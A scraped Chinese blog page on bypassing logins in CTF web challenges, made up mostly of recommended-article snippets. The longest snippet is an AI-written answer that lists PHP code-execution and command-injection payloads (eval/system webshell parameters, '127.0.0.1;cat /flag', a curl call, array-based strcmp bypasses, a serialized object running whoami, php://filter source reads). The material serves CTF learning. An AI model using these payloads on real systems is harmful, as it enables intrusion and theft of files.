ctf的web题目中的绕过登陆

最新推荐文章于 2025-06-09 09:46:52 发布
最新推荐文章于 2025-06-09 09:46:52 发布
阅读量9.9k 收藏 13
点赞数 1
CC 4.0 BY-SA版权
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42349846/article/details/89287610
本文介绍了几种渗透测试中常见的技巧,包括后台登录绕过、利用文件包含漏洞查询FLAG及解析随机种子题目的方法。通过实际案例,展示了如何使用Burp Suite抓取并修改Cookie信息绕过登录验证,以及如何利用在线PHP执行工具进行代码测试。此外,还提供了一个关于随机种子题目的链接,帮助读者深入理解此类题目。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

NSSCTF-Web题目27(Nginx漏洞、php伪协议、php解析绕过)
weixin_54055099的博客
08-01 1217
nginx漏洞、php伪协议、php非法传参
“百度杯” CTF比赛 十月场 Web-登录
qq_34106499的博客
02-18 1664
1. mysql盲注及脚本编写 2. .git泄露
CTF Web 题目一般解题思路
最新发布
lz5217x的博客
06-09 697
Wappalyzer 识别技术栈(框架、数据库等 );抓包工具(Burp Suite )截获请求,检查 Cookie、自定义 Header 藏的提示。(框架 / 语言,如 PHP/Flask ),辅助定位漏洞(如 Flask 可能有 SSTI )。:复现经典赛题(如强网杯、HackTheBox ),总结同类漏洞套路。:输入点(URL 参数、表单、Cookie )传入单引号。(识别服务器类型,如 Nginx/Apache )、字段 )、JS 代码(可能藏接口、加密逻辑 )。:抓包改参数,测试业务流程漏洞。
CTF-Web2-(简单绕过登录过滤)
热门推荐
→_→
07-14 1万+
登陆一下好吗?? 做CTF题时,不要忽略任何信息,要先收集信息,再分解信息,对于出题者的信息,不可全信,也不可不信,具体的来说就是要仔细分析,出题者的意图。 那么,根据这一题的信息,我们了解到这是一道过滤了某些字符的登录注入题型,为了进一步了解点击链接开始答题: 打开链接,我们就能看到一个很简单的一个登录页面,我们可以按F12查看前端代码,看是否有隐藏的信息,结果没有,接下来我们就要考虑给出的信息中提到过滤了一切,我们测试一下,看是否过滤了所有的字符: 点击登录: 从返回的信息.
ctfshow-WEB-web11( 利用session绕过登录验证)
wangyuxiang946的博客
09-06 1万+
ctf.show WEB模块第11关用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过 页面中直接给了源码, 很明显是让我们进行代码审计,源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功 右键检查或者按F12, 进入开发者模式, 查看浏览器的session, 后端代码就是拿这个session的value值与我们输入的密码进行匹配, 由于这个value值我没解密出来, 所以这里干脆一点, 直...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1722
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
太厉害了!360大牛熬夜把PHP安全之道实战整理成了PDF文档_php安全之道 pdf(4)
2401_84302722的博客
05-08 770
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTF Web各种题目的解题姿势
07-27
课时2:SSRF限制绕过策略13'07 课时3:SSRF中可以使用的协议分析17'44 课时4:Linux基础知识21'37 课时5:Redis未授权访问漏洞利用与防御16'17 课时6:Redis未授权添加ssh密钥f17'04 第5章 第五章 课时1:XXE-...
CTF Web安全】PHP弱类型与伪协议漏洞解析:CTF Web题型理论基础及绕过技巧总结
05-13
内容概要:本文档主要介绍了CTF竞赛中Web题型的理论基础,涵盖PHP弱类型特性及其绕过技巧、常见PHP伪协议的应用场景及具体示例。PHP弱类型部分详细解释了“==”与“===”的区别,以及由此引发的各种绕过方法,如md5...
CTF Web学习笔记
01-11
这时可以尝试将Referer设置为题目提供的网址或是任意本地地址(如127.0.0.1),以绕过此类限制。 **5. X-Forward-For** X-Forward-For头用来记录客户端IP地址,常用于代理服务器场景。在某些CTF题目中,网站可能...
网络安全CTF Web题型实战练习与解题技巧总结:Bugku平台典型题目解析及应用
05-13
题目类型包括但不限于查看源代码获取Flag、绕过前端限制、利用PHP特性(如弱类型比较)、文件包含漏洞利用、暴力破解、以及通过Burp Suite进行抓包分析等。通过这些实例,读者可以深入了解Web安全漏洞的原理及其利用...
ctfWEB之后台登录
weixin_30340745的博客
06-02 1880
1、后台登录 格式:flag:{xxx} 解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 打开链接: 查看源码,发现一段被注释的代码,有用: 仔细分析这一句: $sql = "SELECT * FROM admin WHERE username = 'admin' and password ...
ctfshow-WEB-web11( 利用session绕过登录验证)_ctf
2401_84297560的博客
05-16 442
页面中直接给了源码, 很明显是让我们进行代码审计, 源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功右键检查或者按F12, 进入开发者模式, 查看浏览器的session, 后端代码就是拿这个session的value值与我们输入的密码进行匹配, 由于这个value值我没解密出来, 所以这里干脆一点, 直接删除让变成空, 而后我们密码什么也不输, 也会是空, 空=空, 从而登录成功。
CTF练习-Web1简单登录
weixin_43992606的博客
06-25 1842
CTF初入门小白,记录做题过程。
CNVD-2021-49104——泛微E-Office文件上传漏洞
2401_84264692的博客
05-16 514
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。需要完整版PDF学习资源。构造请求上传文件即可。
CTF-WEB 一个登录框SQL盲注
weixin_45887311的博客
04-24 1万+
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。 首先找注入点: 发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。 但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了) 开始尝试编写脚本,结果发现简单的reuqests解析不了<div>标签下的内容 ...
CTF-Web11(涉及SQL注入的绕过
→_→
08-27 1368
11.加了料的报错注入 先查看网页源代码,收集信息: 分析: 页面提示我们POSTusername与password两个参数,看了看源码,里面提示了我们sql语句 $sql="select*fromusers whereusername='$username'andpassword='$password'"; 先随手p...
BugkuCTF_Web——“各种绕过”、“web8”、“细心”
Ho1aAs‘s Blog
10-24 494
文章目录一、“各种绕过”二、“web8”三、“细心”完 一、“各种绕过” 访问环境,审计代码 需要POST$passwd,GET$id和$uname 而且passwd和uname需要绕过sha1函数,并且二者值不等,这里考虑数组绕过 做法如下: 二、“web8” 题目提示txt 访问环境,先审计代码 第二行进行了变量覆盖,需要将文件名赋给$fn,将文件内容赋给$ac,就能获得flag 根据提示,尝试访问flag.txt 因此直接获得flag flag{3cfb7a90fc0de31} 三、“
html5判断用输入密码,CTFWeb密码绕过(特殊的万能密码绕过)详解
weixin_29144347的博客
06-05 2984
可能做过CTF题的朋友们,都有一定的了解过Web登陆密码绕过这种类型的题目绕过的方法也有很多,层次不穷,今天帮朋友的时候也遇到了这类型的题目,但是又非常的特别,网络上也是很少见的,特意分享出来一下。题目:admin的密码非常长,但是有最短的方式绕过。前台代码:admin的密码非常长,但是有最短的方式绕过绕过方法:这里用到的是SQL注入万能密码绕过:用户名为:admin,密码为:'='。原理:原理...
CTFweb题目中有函数的情况
03-26
<think>嗯,用户想了解CTF竞赛中涉及函数的Web题目解题方法和技巧。我需要先回忆一下常见的CTF Web题型,尤其是和函数相关的。比如PHP中的一些危险函数,像eval()、system()、exec(),这些函数如果参数可控的话,可能导致代码执行或者命令注入。用户提到的数组绕过,可能涉及到通过传递数组来绕过某些过滤,比如strcmp函数比较数组和字符串时会返回NULL,从而绕过条件判断。 另外,用户提供的引用中有提到数组返回NULL绕过的情况,比如使用name[]=a这样的参数,这可能在某些PHP代码中让$_GET['name']变成数组,导致函数处理时出错。例如,strcmp($_POST['password'], $hardcode_pass)当password是数组时,strcmp返回NULL,而NULL在松散比较中等于0,从而绕过验证。 接下来,可能需要考虑其他函数的利用,比如create_function(),它会在内部执行eval,如果参数可控的话,可能存在代码注入。还有preg_replace()使用/e修饰符时,可以执行替换后的字符串作为代码。这些都需要在解题时注意。 另外,反序列化漏洞中的魔术方法,比如__destruct()、__wakeup(),如果类中有危险函数被调用,也可能导致漏洞。需要检查反序列化入口点,构造合适的payload。 还有文件包含函数,比如include、require,如果路径可控,可能结合伪协议如php://filter来读取源码,或者进行日志注入。 用户提到的引用中还有关于反引号传递的问题,可能涉及到命令执行,当参数在反引号中但无法直接闭合时,可能需要通过其他方式注入命令,比如利用环境变量或者参数污染。 此外,一些过滤绕过技巧,比如编码、字符串拼接、特殊字符替换等,也是关键。比如用${IFS}代替空格,用base64编码命令再解码执行。 最后,可能需要总结常见的解题步骤:寻找危险函数,确定参数是否可控,构造payload绕过过滤,利用函数特性执行恶意操作。同时结合题目给出的引用案例,比如数组绕过和命令注入的方法,来具体分析。</think>### CTF Web题型中函数相关漏洞的解题方法 在CTF Web题目中,函数的使用常涉及代码执行、参数过滤绕过等核心考点。以下是三类典型场景的解题技巧: --- #### 一、危险函数直接利用 1. **代码执行类函数** - `eval()`:直接执行输入字符串的PHP代码 ```php <?php eval($_GET['cmd']); ?> // payload: ?cmd=system('ls'); ``` - `create_function()`:通过注入闭合函数体构造代码执行 ```php $func = create_function('$a','}system($_GET[cmd]);//'); ``` - `preg_replace()`:使用`/e`修饰符时执行替换内容 ```php preg_replace('/pattern/e', $_GET['repl'], 'data'); // payload: repl=phpinfo() ``` 2. **命令执行类函数** - `system()`/`exec()`:通过参数污染执行命令 ```php system("ping ".$_GET['ip']); // payload: ip=127.0.0.1;cat /flag ``` - 反引号操作符:利用环境变量拼接命令 ```bash `$_GET['c']` // payload: c=curl${IFS}example.com ``` --- #### 二、参数过滤绕过技巧 1. **数组绕过黑名单** - `strcmp()`漏洞:传递数组使返回值为`NULL` ```php if(strcmp($_POST['pass'], 'secret') == 0){...} // payload: pass[]=a --> NULL == 0 成立[^1] ``` - `md5()`碰撞:通过数组制造哈希冲突 ```php if(md5($_GET['a']) == md5($_GET['b'])){...} // payload: a[]=1&b[]=2 ``` 2. **编码绕过** - Base64嵌套编码:`system(base64_decode($_GET['c']))` ```url ?c=Y2F0IC9mbGFn # cat /flag的base64编码 ``` - Hex转换:`eval(hex2bin($_POST['h']))` --- #### 三、特殊场景利用 1. **反序列化魔术方法** ```php class VulnClass { function __destruct(){ system($this->cmd); // payload: O:8:"VulnClass":1:{s:3:"cmd";s:6:"whoami";} } } ``` 2. **文件包含伪协议** ```php include($_GET['file']); // payload: file=php://filter/convert.base64-encode/resource=index.php ``` 3. **动态函数调用** ```php $_GET{'a'}($_GET['b']); // payload: a=system&b=id ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值